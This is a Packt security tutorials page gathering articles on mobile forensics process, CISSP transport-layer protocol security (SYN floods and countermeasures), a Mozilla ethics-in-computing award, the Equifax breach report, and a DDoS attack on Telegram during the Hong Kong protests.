Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

174 Articles
article-image-introduction-mobile-forensics
Packt
10 Jul 2014
18 min read
Save for later

Introduction to Mobile Forensics

Packt
10 Jul 2014
18 min read
(For more resources related to this topic, see here.) In 2013, there were almost as many mobile cellular subscriptions as there were people on earth, says International Telecommunication Union (ITU). The following figure shows the global mobile cellular subscriptions from 2005 to 2013. Mobile cellular subscriptions are moving at lightning speed and passed a whopping 7 billion early in 2014. Portio Research Ltd. predicts that mobile subscribers will reach 7.5 billion by the end of 2014 and 8.5 billion by the end of 2016. Mobile cellular subscription growth from 2005 to 2013 Smartphones of today, such as the Apple iPhone, Samsung Galaxy series, and BlackBerry phones, are compact forms of computers with high performance, huge storage, and enhanced functionalities. Mobile phones are the most personal electronic device a user accesses. They are used to perform simple communication tasks, such as calling and texting, while still providing support for Internet browsing, e-mail, taking photos and videos, creating and storing documents, identifying locations with GPS services, and managing business tasks. As new features and applications are incorporated into mobile phones, the amount of information stored on the devices is continuously growing. Mobiles phones become portable data carriers, and they keep track of all your moves. With the increasing prevalence of mobile phones in peoples' daily lives and in crime, data acquired from phones become an invaluable source of evidence for investigations relating to criminal, civil, and even high-profile cases. It is rare to conduct a digital forensic investigation that does not include a phone. Mobile device call logs and GPS data were used to help solve the attempted bombing in Times Square, New York, in 2010. The details of the case can be found at http://www.forensicon.com/forensics-blotter/cell-phone-email-forensics-investigation-cracks-nyc-times-square-car-bombing-case/. The science behind recovering digital evidence from mobile phones is called mobile forensics. Digital evidence is defined as information and data that is stored on, received, or transmitted by an electronic device that is used for investigations. Digital evidence encompasses any and all digital data that can be used as evidence in a case. Mobile forensics Digital forensics is a branch of forensic science, focusing on the recovery and investigation of raw data residing in electronic or digital devices. Mobile forensics is a branch of digital forensics related to the recovery of digital evidence from mobile devices. Forensically sound is a term used extensively in the digital forensics community to qualify and justify the use of particular forensic technology or methodology. The main principle for a sound forensic examination of digital evidence is that the original evidence must not be modified. This is extremely difficult with mobile devices. Some forensic tools require a communication vector with the mobile device, thus standard write protection will not work during forensic acquisition. Other forensic acquisition methods may involve removing a chip or installing a bootloader on the mobile device prior to extracting data for forensic examination. In cases where the examination or data acquisition is not possible without changing the configuration of the device, the procedure and the changes must be tested, validated, and documented. Following proper methodology and guidelines is crucial in examining mobile devices as it yields the most valuable data. As with any evidence gathering, not following the proper procedure during the examination can result in loss or damage of evidence or render it inadmissible in court. The mobile forensics process is broken into three main categories: seizure, acquisition, and examination/analysis. Forensic examiners face some challenges while seizing the mobile device as a source of evidence. At the crime scene, if the mobile device is found switched off, the examiner should place the device in a faraday bag to prevent changes should the device automatically power on. Faraday bags are specifically designed to isolate the phone from the network. If the phone is found switched on, switching it off has a lot of concerns attached to it. If the phone is locked by a PIN or password or encrypted, the examiner will be required to bypass the lock or determine the PIN to access the device. Mobile phones are networked devices and can send and receive data through different sources, such as telecommunication systems, Wi-Fi access points, and Bluetooth. So if the phone is in a running state, a criminal can securely erase the data stored on the phone by executing a remote wipe command. When a phone is switched on, it should be placed in a faraday bag. If possible, prior to placing the mobile device in the faraday bag, disconnect it from the network to protect the evidence by enabling the flight mode and disabling all network connections (Wi-Fi, GPS, Hotspots, and so on). This will also preserve the battery, which will drain while in a faraday bag and protect against leaks in the faraday bag. Once the mobile device is seized properly, the examiner may need several forensic tools to acquire and analyze the data stored on the phone. Mobile device forensic acquisition can be performed using multiple methods, which are defined later. Each of these methods affects the amount of analysis required. Should one method fail, another must be attempted. Multiple attempts and tools may be necessary in order to acquire the most data from the mobile device. Mobile phones are dynamic systems that present a lot of challenges to the examiner in extracting and analyzing digital evidence. The rapid increase in the number of different kinds of mobile phones from different manufacturers makes it difficult to develop a single process or tool to examine all types of devices. Mobile phones are continuously evolving as existing technologies progress and new technologies are introduced. Furthermore, each mobile is designed with a variety of embedded operating systems. Hence, special knowledge and skills are required from forensic experts to acquire and analyze the devices. Mobile forensic challenges One of the biggest forensic challenges when it comes to the mobile platform is the fact that data can be accessed, stored, and synchronized across multiple devices. As the data is volatile and can be quickly transformed or deleted remotely, more effort is required for the preservation of this data. Mobile forensics is different from computer forensics and presents unique challenges to forensic examiners. Law enforcement and forensic examiners often struggle to obtain digital evidence from mobile devices. The following are some of the reasons: Hardware differences: The market is flooded with different models of mobile phones from different manufacturers. Forensic examiners may come across different types of mobile models, which differ in size, hardware, features, and operating system. Also, with a short product development cycle, new models emerge very frequently. As the mobile landscape is changing each passing day, it is critical for the examiner to adapt to all the challenges and remain updated on mobile device forensic techniques. Mobile operating systems: Unlike personal computers where Windows has dominated the market for years, mobile devices widely use more operating systems, including Apple's iOS, Google's Android, RIM's BlackBerry OS, Microsoft's Windows Mobile, HP's webOS, Nokia's Symbian OS, and many others. Mobile platform security features: Modern mobile platforms contain built-in security features to protect user data and privacy. These features act as a hurdle during the forensic acquisition and examination. For example, modern mobile devices come with default encryption mechanisms from the hardware layer to the software layer. The examiner might need to break through these encryption mechanisms to extract data from the devices. Lack of resources: As mentioned earlier, with the growing number of mobile phones, the tools required by a forensic examiner would also increase. Forensic acquisition accessories, such as USB cables, batteries, and chargers for different mobile phones, have to be maintained in order to acquire those devices. Generic state of the device: Even if a device appears to be in an off state, background processes may still run. For example, in most mobiles, the alarm clock still works even when the phone is switched off. A sudden transition from one state to another may result in the loss or modification of data. Anti-forensic techniques: Anti-forensic techniques, such as data hiding, data obfuscation, data forgery, and secure wiping, make investigations on digital media more difficult. Dynamic nature of evidence: Digital evidence may be easily altered either intentionally or unintentionally. For example, browsing an application on the phone might alter the data stored by that application on the device. Accidental reset: Mobile phones provide features to reset everything. Resetting the device accidentally while examining may result in the loss of data. Device alteration: The possible ways to alter devices may range from moving application data, renaming files, and modifying the manufacturer's operating system. In this case, the expertise of the suspect should be taken into account. Passcode recovery: If the device is protected with a passcode, the forensic examiner needs to gain access to the device without damaging the data on the device. Communication shielding: Mobile devices communicate over cellular networks, Wi-Fi networks, Bluetooth, and Infrared. As device communication might alter the device data, the possibility of further communication should be eliminated after seizing the device. Lack of availability of tools: There is a wide range of mobile devices. A single tool may not support all the devices or perform all the necessary functions, so a combination of tools needs to be used. Choosing the right tool for a particular phone might be difficult. Malicious programs: The device might contain malicious software or malware, such as a virus or a Trojan. Such malicious programs may attempt to spread over other devices over either a wired interface or a wireless one. Legal issues: Mobile devices might be involved in crimes, which can cross geographical boundaries. In order to tackle these multijurisdictional issues, the forensic examiner should be aware of the nature of the crime and the regional laws. Mobile phone evidence extraction process Evidence extraction and forensic examination of each mobile device may differ. However, following a consistent examination process will assist the forensic examiner to ensure that the evidence extracted from each phone is well documented and that the results are repeatable and defendable. There is no well-established standard process for mobile forensics. However, the following figure provides an overview of process considerations for extraction of evidence from mobile devices. All methods used when extracting data from mobile devices should be tested, validated, and well documented. A great resource for handling and processing mobile devices can be found at http://digital-forensics.sans.org/media/mobile-device-forensic-process-v3.pdf. Mobile phone evidence extraction process The evidence intake phase The evidence intake phase is the starting phase and entails request forms and paperwork to document ownership information and the type of incident the mobile device was involved in, and outlines the type of data or information the requester is seeking. Developing specific objectives for each examination is the critical part of this phase. It serves to clarify the examiner's goals. The identification phase The forensic examiner should identify the following details for every examination of a mobile device: The legal authority The goals of the examination The make, model, and identifying information for the device Removable and external data storage Other sources of potential evidence We will discuss each of them in the following sections. The legal authority It is important for the forensic examiner to determine and document what legal authority exists for the acquisition and examination of the device as well as any limitations placed on the media prior to the examination of the device. The goals of the examination The examiner will identify how in-depth the examination needs to be based upon the data requested. The goal of the examination makes a significant difference in selecting the tools and techniques to examine the phone and increases the efficiency of the examination process. The make, model, and identifying information for the device As part of the examination, identifying the make and model of the phone assists in determining what tools would work with the phone. Removable and external data storage Many mobile phones provide an option to extend the memory with removable storage devices, such as the Trans Flash Micro SD memory expansion card. In cases when such a card is found in a mobile phone that is submitted for examination, the card should be removed and processed using traditional digital forensic techniques. It is wise to also acquire the card while in the mobile device to ensure data stored on both the handset memory and card are linked for easier analysis. Other sources of potential evidence Mobile phones act as good sources of fingerprint and other biological evidence. Such evidence should be collected prior to the examination of the mobile phone to avoid contamination issues unless the collection method will damage the device. Examiners should wear gloves when handling the evidence. The preparation phase Once the mobile phone model is identified, the preparation phase involves research regarding the particular mobile phone to be examined and the appropriate methods and tools to be used for acquisition and examination. The isolation phase Mobile phones are by design intended to communicate via cellular phone networks, Bluetooth, Infrared, and wireless (Wi-Fi) network capabilities. When the phone is connected to a network, new data is added to the phone through incoming calls, messages, and application data, which modifies the evidence on the phone. Complete destruction of data is also possible through remote access or remote wiping commands. For this reason, isolation of the device from communication sources is important prior to the acquisition and examination of the device. Isolation of the phone can be accomplished through the use of faraday bags, which block the radio signals to or from the phone. Past research has found inconsistencies in total communication protection with faraday bags. Therefore, network isolation is advisable. This can be done by placing the phone in radio frequency shielding cloth and then placing the phone into airplane or flight mode. The processing phase Once the phone has been isolated from the communication networks, the actual processing of the mobile phone begins. The phone should be acquired using a tested method that is repeatable and is as forensically sound as possible. Physical acquisition is the preferred method as it extracts the raw memory data and the device is commonly powered off during the acquisition process. On most devices, the least amount of changes occur to the device during physical acquisition. If physical acquisition is not possible or fails, an attempt should be made to acquire the file system of the mobile device. A logical acquisition should always be obtained as it may contain only the parsed data and provide pointers to examine the raw memory image. The verification phase After processing the phone, the examiner needs to verify the accuracy of the data extracted from the phone to ensure that data is not modified. The verification of the extracted data can be accomplished in several ways. Comparing extracted data to the handset data Check if the data extracted from the device matches the data displayed by the device. The data extracted can be compared to the device itself or a logical report, whichever is preferred. Remember, handling the original device may make changes to the only evidence—the device itself. Using multiple tools and comparing the results To ensure accuracy, use multiple tools to extract the data and compare results. Using hash values All image files should be hashed after acquisition to ensure data remains unchanged. If file system extraction is supported, the examiner extracts the file system and then computes hashes for the extracted files. Later, any individually extracted file hash is calculated and checked against the original value to verify the integrity of it. Any discrepancy in a hash value must be explainable (for example, if the device was powered on and then acquired again, thus the hash values are different). The document and reporting phase The forensic examiner is required to document throughout the examination process in the form of contemporaneous notes relating to what was done during the acquisition and examination. Once the examiner completes the investigation, the results must go through some form of peer-review to ensure the data is checked and the investigation is complete. The examiner's notes and documentation may include information such as the following: Examination start date and time The physical condition of the phone Photos of the phone and individual components Phone status when received—turned on or off Phone make and model Tools used for the acquisition Tools used for the examination Data found during the examination Notes from peer-review The presentation phase Throughout the investigation, it is important to make sure that the information extracted and documented from a mobile device can be clearly presented to any other examiner or to a court. Creating a forensic report of data extracted from the mobile device during acquisition and analysis is important. This may include data in both paper and electronic formats. Your findings must be documented and presented in a manner that the evidence speaks for itself when in court. The findings should be clear, concise, and repeatable. Timeline and link analysis, features offered by many commercial mobile forensics tools, will aid in reporting and explaining findings across multiple mobile devices. These tools allow the examiner to tie together the methods behind the communication of multiple devices. The archiving phase Preserving the data extracted from the mobile phone is an important part of the overall process. It is also important that the data is retained in a useable format for the ongoing court process, for future reference, should the current evidence file become corrupt, and for record keeping requirements. Court cases may continue for many years before the final judgment is arrived at, and most jurisdictions require that data be retained for long periods of time for the purposes of appeals. As the field and methods advance, new methods for pulling data out of a raw, physical image may surface, and then the examiner can revisit the data by pulling a copy from the archives. Practical mobile forensic approaches Similar to any forensic investigation, there are several approaches that can be used for the acquisition and examination/analysis of data from mobile phones. The type of mobile device, the operating system, and the security setting generally dictate the procedure to be followed in a forensic process. Every investigation is distinct with its own circumstances, so it is not possible to design a single definitive procedural approach for all the cases. The following details outline the general approaches followed in extracting data from mobile devices. Mobile operating systems overview One of the major factors in the data acquisition and examination/analysis of a mobile phone is the operating system. Starting from low-end mobile phones to smartphones, mobile operating systems have come a long way with a lot of features. Mobile operating systems directly affect how the examiner can access the mobile device. For example, Android OS gives terminal-level access whereas iOS does not give such an option. A comprehensive understanding of the mobile platform helps the forensic examiner make sound forensic decisions and conduct a conclusive investigation. While there is a large range of smart mobile devices, four main operating systems dominate the market, namely, Google Android, Apple iOS, RIM BlackBerry OS, and Windows Phone. More information can be found at http://www.idc.com/getdoc.jsp?containerId=prUS23946013. Android Android is a Linux-based operating system, and it's a Google open source platform for mobile phones. Android is the world's most widely used smartphone operating system. Sources show that Apple's iOS is a close second (http://www.forbes.com/sites/tonybradley/2013/11/15/android-dominates-market-share-but-apple-makes-all-the-money/). Android has been developed by Google as an open and free option for hardware manufacturers and phone carriers. This makes Android the software of choice for companies who require a low-cost, customizable, lightweight operating system for their smart devices without developing a new OS from scratch. Android's open nature has further encouraged the developers to build a large number of applications and upload them onto Android Market. Later, end users can download the application from Android Market, which makes Android a powerful operating system. iOS iOS, formerly known as the iPhone operating system, is a mobile operating system developed and distributed solely by Apple Inc. iOS is evolving into a universal operating system for all Apple mobile devices, such as iPad, iPod touch, and iPhone. iOS is derived from OS X, with which it shares the Darwin foundation, and is therefore a Unix-like operating system. iOS manages the device hardware and provides the technologies required to implement native applications. iOS also ships with various system applications, such as Mail and Safari, which provide standard system services to the user. iOS native applications are distributed through AppStore, which is closely monitored by Apple. Windows phone Windows phone is a proprietary mobile operating system developed by Microsoft for smartphones and pocket PCs. It is the successor to Windows mobile and primarily aimed at the consumer market rather than the enterprise market. The Windows Phone OS is similar to the Windows desktop OS, but it is optimized for devices with a small amount of storage. BlackBerry OS BlackBerry OS is a proprietary mobile operating system developed by BlackBerry Ltd., known as Research in Motion (RIM), exclusively for its BlackBerry line of smartphones and mobile devices. BlackBerry mobiles are widely used in corporate companies and offer native support for corporate mail via MIDP, which enables wireless sync with Microsoft Exchange, e-mail, contacts, calendar, and so on, while used along with the BlackBerry Enterprise server. These devices are known for their security.
Read more
  • 0
  • 0
  • 20309

article-image-communication-and-network-security
Packt
21 Jun 2016
7 min read
Save for later

Communication and Network Security

Packt
21 Jun 2016
7 min read
In this article by M. L. Srinivasan, the author of the book CISSP in 21 Days, Second Edition, the communication and network security domain deals with the security of voice and data communications through Local area, Wide area, and Remote access networking. Candidates are expected to have knowledge in the areas of secure communications; securing networks; threats, vulnerabilities, attacks, and countermeasures to communication networks; and protocols that are used in remote access. (For more resources related to this topic, see here.) Observe the following diagram. This represents seven layers of the OSI model. This article covers protocols and security in the fourth layer, which is the Transport layer: Transport layer protocols and security The Transport layer does two things. One is to pack the data given out by applications to a format that is suitable for transport over the network, and the other is to unpackthe data received from the network to a format suitable for applications. In this layer, some of the important protocols are Transmission Control Protocol (TCP), User Datagram Protocol (UDP), Stream Control Transmission Protocol (SCTP), Datagram Congestion Control Protocol (DCCP), and Fiber Channel Protocol (FCP). The process of packaging the data packets received from the applications is called encapsulation, and the output of such a process is called a datagram. Similarly, the process of unpacking the datagram received from the network is called decapstulation. When moving from the seventh layer down to the fourth one, when the fourth layer's header is placed on data, it comes as a datagram. When the datagram is encapsulated with the third layer's header, it becomes a packet, the encapsulated packet becomes a frame, and puts on the wire as bits. The following section describes some of the important protocols in this layer along with security concerns and countermeasures. Transmission Control Protocol (TCP) It is a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol. A protocol that guarantees the delivery of datagram (packets) to the destination application by way of a suitable mechanism (for example, a three-way handshake SYN, SYN-ACK, and ACK in TCP) is called a connection-oriented protocol. The reliability of the datagram delivery of such protocol is high due to the acknowledgment part by the receiver. This protocol has two primary functions. The primary function of TCP is the transmission of datagram between applications, and the secondary one is in terms of controls that are necessary for ensuring reliable transmissions. Applications where the delivery needs to be assured such as e-mail, the World Wide Web (WWW), file transfer,and so on use TCP for transmission. Threats, vulnerabilities, attacks, and countermeasures One of the common threats to TCP is a service disruption. A common vulnerability is half-open connections exhausting the server resources. The Denial of Service attacks such as TCP SYN attacks as well as connection hijacking such as IP Spoofing attacks are possible. A half-open connection is a vulnerability in the TCP implementation.TCP uses a three-way handshake to establish or terminate connections. Refer to the following diagram: In a three-way handshake, the client first (workstation) sends a request to the server (for example www.SomeWebsite.com). This is called a SYN request. The server acknowledges the request by sending a SYN-ACK, and in the process, it creates a buffer for this connection. The client does a final acknowledgement by ACK. TCP requires this setup, since the protocol needs to ensure the reliability of the packet delivery. If the client does not send the final ACK, then the connection is called half open. Since the server has created a buffer for that connection,a certain amount of memory or server resource is consumed. If thousands of such half-open connections are created maliciously, then the server resources maybe completely consumed resulting in the Denial-of-Service to legitimate requests. TCP SYN attacks are technically establishing thousands of half-open connections to consume the server resources. There are two actions that an attacker might do. One is that the attacker or malicious software will send thousands of SYN to the server and withheld ACK. This is called SYN flooding. Depending on the capacity of the network bandwidth and the server resources, in a span of time,all the resources will be consumed resulting in the Denial-of-Service. If the source IP was blocked by some means, then the attacker or the malicious software would try to spoof the source IP addresses to continue the attack. This is called SYN spoofing. SYN attacks such as SYN flooding and SYN spoofing can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. The server creates a cookie with the computed hash of the source IP address, source port, destination IP, destination port, and some random values based on the algorithm and sends it as SYN-ACK. When the server receives an ACK, it checks the details and creates the connection. A cookie is a piece of information usually in the form of text file sent by the server to a client. Cookies are generally stored in browser disk or client computers, and they are used for purposes such as authentication, session tracking, and management. User Datagram Protocol (UDP) UDP is a connectionless protocol and is similar to TCP. However, UDP does not provide the delivery guarantee of data packets. A protocol that does not guarantee the delivery of datagram (packets) to the destination is called connectionless protocol. In other words, the final acknowledgment is not mandatory in UDP. UDP uses one-way communication. The speed delivery of the datagram by UDP is high. UDP is predominantly used where a loss of intermittent packets is acceptable such as video or audio streaming. Threats, vulnerabilities, attacks, and countermeasures Service disruptions are common threats, and validation weaknesses facilitate such threats. UDP flood attacks cause service disruptions, and controlling UDP packet size acts as a countermeasure to such attacks. Internet Control Message Protocol (ICMP) ICMP is used to discover service availability in network devices, servers ,and so on. ICMP expects response messages from devices or systems to confirm the service availability. Threats, vulnerabilities, attacks, and countermeasures Service disruptions are common threats. Validation weaknesses facilitate such threats. ICMP flood attacks, such as the ping of death, causes service disruptions; and controlling ICMP packet size acts as a countermeasure to such attacks. Pinging is a process of sending the Internet Control Message Protocol (ICMP) ECHO_REQUEST message to servers or hosts to check whether they are up and running. In this process,the server or host on the network responds to a ping request, and such a response is called echo. A ping of death refers to sending large numbers of ICMP packets to the server to crash the system. Other protocols in transport layer Stream Control Transmission Protocol (SCTP): This is a connection-oriented protocol similar to TCP, but it provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in UNIX-like operating systems. Datagram Congestion Control Protocol (DCCP): As the name implies, this is a Transport layer protocol that is used for congestion control. Applications her include the Internet telephony and video/audio streaming over the network. Fiber Channel Protocol (FCP): This protocol is used in high-speed networking. One of the prominent applications here is Storage Area Network (SAN). Storage Area Network (SAN) is a network architecture used to attach remote storage devices, such as tape drives anddisk arrays, to the local server. This facilitates using storage devices as if they are local devices. Summary This article covers protocols and security in thetransport layer, which is the fourth layer. Resources for Article: Further resources on this subject: The GNS3 orchestra [article] CISSP: Vulnerability and Penetration Testing for Access Control [article] CISSP: Security Measures for Access Control [article]
Read more
  • 0
  • 0
  • 20300

article-image-mozilla-announces-3-5-million-award-for-responsible-computer-science-challenge-to-encourage-teaching-ethical-coding-to-cs-graduates
Melisha Dsouza
11 Oct 2018
3 min read
Save for later

Mozilla announces $3.5 million award for ‘Responsible Computer Science Challenge’ to encourage teaching ethical coding to CS graduates

Melisha Dsouza
11 Oct 2018
3 min read
Mozilla, along with Omidyar Network, Schmidt Futures, and Craig Newmark Philanthropies, has launched an initiative for professors, graduate students, and teaching assistants at U.S. colleges and universities to integrate and demonstrate the relevance of ethics into computer science education at the undergraduate level. This competition, titled 'Responsible Computer Science Challenge' has solely been launched to foster the idea of 'ethical coding' into today's times. Code written by computer scientists are widely used in fields ranging from data collection to analysis. Poorly designed code can have a negative impact on a user's privacy and security. This challenge seeks creative approaches to integrating ethics and societal considerations into undergraduate computer science education. Ideas pitched by contestants will be judged by an independent panel of experts from academia, profit and non-profit organizations and tech companies. The best proposals will be awarded up to $3.5 million over the next two years. "We are looking to encourage ways of teaching ethics that make sense in a computer science program, that make sense today, and that make sense in understanding questions of data." -Mitchell Baker, founder and chairwoman of the Mozilla Foundation What is this challenge all about? Professors are encouraged to tweak class material, for example, integrating a reading assignment on ethics to go with each project, or having computer science lessons co-taught with teaching assistants from the ethics department. The coursework introduced should encourage students to use their logical skills and come up with ideas to incorporate humanistic principles. The challenge consists of two stages: a Concept Development and Pilot Stage and a Spread and Scale Stage.T he first stage will award these proposals up to $150,000 to try out their ideas firsthand, for instance at the university where the educator teaches. The second stage will select the best of the pilots and grant them $200,000 to help them scale to other universities. Baker asserts that the competition and its prize money will yield substantial and relevant practical ideas. Ideas will be judged based on the potential of their approach, the feasibility of success, a difference from existing solutions, impact on the society, bringing new perspectives to ethics and scalability of the solution. Mozilla’s competition comes as welcomed venture after many of the top universities, like Harvard and MIT, are taking initiatives to integrate ethics within their computer science department. To know all about the competition, head over to Mozilla’s official Blog. You can also check out the entire coverage of this story at Fast Company. Mozilla drops “meritocracy” from its revised governance statement and leadership structure to actively promote diversity and inclusion Mozilla optimizes calls between JavaScript and WebAssembly in Firefox, making it almost as fast as JS to JS calls Mozilla’s new Firefox DNS security updates spark privacy hue and cry
Read more
  • 0
  • 0
  • 20061

article-image-equifax-data-breach-could-have-been-entirely-preventable-says-house-oversight-and-government-reform-committee-staff-report
Savia Lobo
11 Dec 2018
5 min read
Save for later

Equifax data breach could have been “entirely preventable”, says House oversight and government reform committee staff report

Savia Lobo
11 Dec 2018
5 min read
Update: On July 22, 2019, Equifax announced a global settlement including up to $425 million to help people affected by the data breach.  Two days back, the House Oversight and Government Reform Committee released a staff report on Equifax’s data breach that affected 143 million U.S. consumers on September 7, 2017, which could have been "entirely preventable”. On September 14, 2017, the Committee opened an investigation into the Equifax data breach. After the 14-month-long investigation, the staff report highlights the circumstances of the cyber attack, which compromised the authenticating details, such as dates of birth, and social security numbers, of more than half of American consumers. In August 2017, three weeks before Equifax publicly announced the breach, Richard Smith, the former CEO of Equifax, boasted that the company was managing “almost 1,200 times” the amount of data held in the Library of Congress every day. However, Equifax failed to implement an adequate security program to protect this sensitive data. As a result, Equifax allowed one of the largest data breaches in U.S. history. The loopholes that led to a massive data breach Equifax had serious gaps between IT policy development and execution According to the Committee, Equifax failed to implement clear lines of authority within their internal IT management structure. This led to an execution gap between IT policy development and operation. Thus, the gap restricted the company’s ability to implement security initiatives in a comprehensive and timely manner. On March 7, 2017, a critical vulnerability in the Apache Struts software was publicly disclosed. Equifax used Apache Struts to run certain applications on legacy operating systems. The following day, the Department of Homeland Security alerted Equifax to this critical vulnerability. Equifax’s Global Threat and Vulnerability Management (GTVM) team emailed this alert to over 400 people on March 9, instructing anyone who had Apache Struts running on their system to apply the necessary patch within 48 hours. The Equifax GTVM team also held a meeting on March 16 about this vulnerability. Equifax, however, did not fully patch its systems. Equifax’s Automated Consumer Interview System (ACIS), a custom-built internet-facing consumer dispute portal developed in the 1970s, was running a version of Apache Struts containing the vulnerability. Equifax did not patch the Apache Struts software located within ACIS, leaving its systems and data exposed. Equifax had complex and outdated IT systems Equifax’s aggressive growth strategy led to the acquisition of multiple companies, information technology (IT) systems, and data. The acquisition strategy may have been successful for the company’s bottom line and stock price, but this growth also brought increasing complexity to Equifax’s IT systems and expanded data security risk. Both the complexity and antiquated nature of Equifax’s custom-built legacy systems made IT security especially challenging. The company failed to implement responsible security measurements Per the committee, Equifax knew of the potential security risks posed by expired SSL certificates. An internal vulnerability assessment tracker entry dated January 20, 2017, stated “SSLV devices are missing certificates, limiting visibility to web-based attacks on [intrusion prevention system]”. Despite this, the company had allowed over 300 security certificates to expire, including 79 certificates for monitoring business-critical domains. Had Equifax implemented a certificate management process with defined roles and responsibilities, the SSL certificate on the device monitoring the ACIS platform would have been active when the intrusion began on May 13, 2017. The company would have been able to see the suspicious traffic to and from the ACIS platform much earlier – potentially mitigating or preventing the data breach. On August 30, 2018, GAO (U.S. Government Accountability Office) published a report detailing Equifax’s information security remediation activities to date. According to GAO, “ a misconfigured monitoring device allowed encrypted web traffic to go uninspected through the Equifax network. To prevent this from happening again, GAO reported Equifax developed new policies and implemented new tools to ensure network traffic is monitored continuously.” In its 2018 Annual Proxy Statement to investors, Equifax reported on how its Board of Directors was enhancing Board oversight in an effort to strengthen Equifax’s cybersecurity posture. Equifax’s new CEO, Mark Begor told news outlets, “We didn’t have the right defenses in place, but we are investing in the business to protect this from ever happening again.” To know more about this news in detail, read the complete Equifax Data Breach report. Affected users can file now file a claim On July 24, 2019, Equifax announced a settlement of up to $425 million to help people affected by its data breach. This global settlement was done with the Federal Trade Commission, the Consumer Financial Protection Bureau, and 50 U.S. states and territories.  Users whose personal information was exposed in the Equifax data breach can now file a claim on Equifax breach settlement website. For those who are unsure if their data was exposed can find out using the Eligibility tool. To know about the benefits a user would receive on this claim, read FTC’s official blog post. A new data breach on Facebook due to malicious browser extensions allowed almost 81,000 users’ private data up for sale, reports BBC News Uber fined by British ICO and Dutch DPA for nearly $1.2m over a data breach from 2016 Marriott’s Starwood guest database faces a massive data breach affecting 500 million user data
Read more
  • 0
  • 0
  • 20024

article-image-telegram-faces-massive-ddos-attack-suspects-link-to-the-ongoing-hong-kong-protest
Savia Lobo
14 Jun 2019
4 min read
Save for later

Telegram faces massive DDoS attack; suspects link to the ongoing Hong Kong protests

Savia Lobo
14 Jun 2019
4 min read
Telegram’s founder Pavel Durov shared his suspicion that the recent massive DDoS attack on his messaging service was made by the Chinese government. He also stated that this attack coincides with the ongoing Hong Kong protests where protesters used Telegram for their inter-communication to avoid detection as Telegram can function both in online as well as offline. https://twitter.com/durov/status/1138942773430804480 On Jun 12, a tweet from Telegram Messenger informed users that the messaging service was “experiencing a powerful DDoS attack”. It further said that this attack was flooding its servers with “garbage requests”, thus disrupting legitimate communications. Telegram allows people to send encrypted messages, documents, videos and pictures free of charge. Users can create groups for up to 200,000 people or channels for broadcasting to unlimited audiences. The reason for its growing popularity is due to its emphasis on encryption, which prevents many widely used methods of reading confidential communications. Hong Kong protests: A movement opposing the ‘extradition law’ On Sunday, around 1 million people demonstrated in the semi-autonomous Chinese city-state against amendments to an extradition law that would allow a person arrested in Hong Kong to face trial elsewhere, including in mainland China. “Critics fear the law could be used to cement Beijing’s authority over the semi-autonomous city-state, where citizens tend to have a higher level of civil liberties than in mainland China”, The Verge reports. According to The New York Times, “Hong Kong, a semi-autonomous Chinese territory, enjoys greater freedoms than mainland China under a "one country, two systems" framework put in place when the former British colony was returned to China in 1997. Hong Kong residents can freely surf the Internet and participate in public protests, unlike in the mainland.” To avoid surveillance and potential future prosecutions, these protestors disabled location tracking on their phones, bought train tickets using cash and refrained from having conversations on their social media. Many protesters masked their faces to avoid facial recognition and also avoided using public transit cards with a fear that it can be voluntarily linked to their identities, instead opting for paper tickets. According to France24, “Many of those on the streets are predominantly young and have grown up in a digital world, but they are all too aware of the dangers of surveillance and leaving online footprints.” Ben, a masked office worker at the protests, said he feared the extradition law would have a devastating impact on freedoms. "Even if we're not doing anything drastic -- as simple as saying something online about China -- because of such surveillance they might catch us," the 25-year-old told France24. The South China Morning Post first reported on the role the messaging app played in the protests when a Telegram group administrator was arrested for conspiracy to commit public nuisance. The alleged person “managed a conversation involving 30,000 members, is that he plotted with others to charge the Legislative Council Complex and block neighbouring roads”, SCMP reports. Bloomberg reported that protestors “relied on encrypted services to avoid detection. Telegram and Firechat -- a peer-to-peer messaging service that works with or without internet access -- are among the top trending apps in Hong Kong’s Apple store”. “Hong Kong’s Legislative Council suspended a review of the bill for a second day on Thursday amid the continued threat of protests. The city’s leader, Chief Executive Carrie Lam, is seeking to pass the legislation by the end of the current legislative session in July”, Bloomberg reports. Telegram also noted that the DDoS attack appears to have stabilized, and also assured users that their data is safe. https://twitter.com/telegram/status/1138781915560009735 https://twitter.com/telegram/status/1138777137102675969 Telegram explained the DDoS attack in an interesting way: A DDoS is a “Distributed Denial of Service attack”: your servers get GADZILLIONS of garbage requests which stop them from processing legitimate requests. Imagine that an army of lemmings just jumped the queue at McDonald’s in front of you – and each is ordering a whopper. The server is busy telling the whopper lemmings they came to the wrong place – but there are so many of them that the server can’t even see you to try and take your order. NSA warns users of BlueKeep vulnerability; urges them to update their Windows systems Over 19 years of ANU(Australian National University) students’ and staff data breached All Docker versions are now vulnerable to a symlink race attack
Read more
  • 0
  • 0
  • 19853

article-image-dean-wells-on-whats-new-in-windows-server-2019-security
Savia Lobo
17 Dec 2019
9 min read
Save for later

Dean Wells on what’s new in Windows Server 2019 Security

Savia Lobo
17 Dec 2019
9 min read
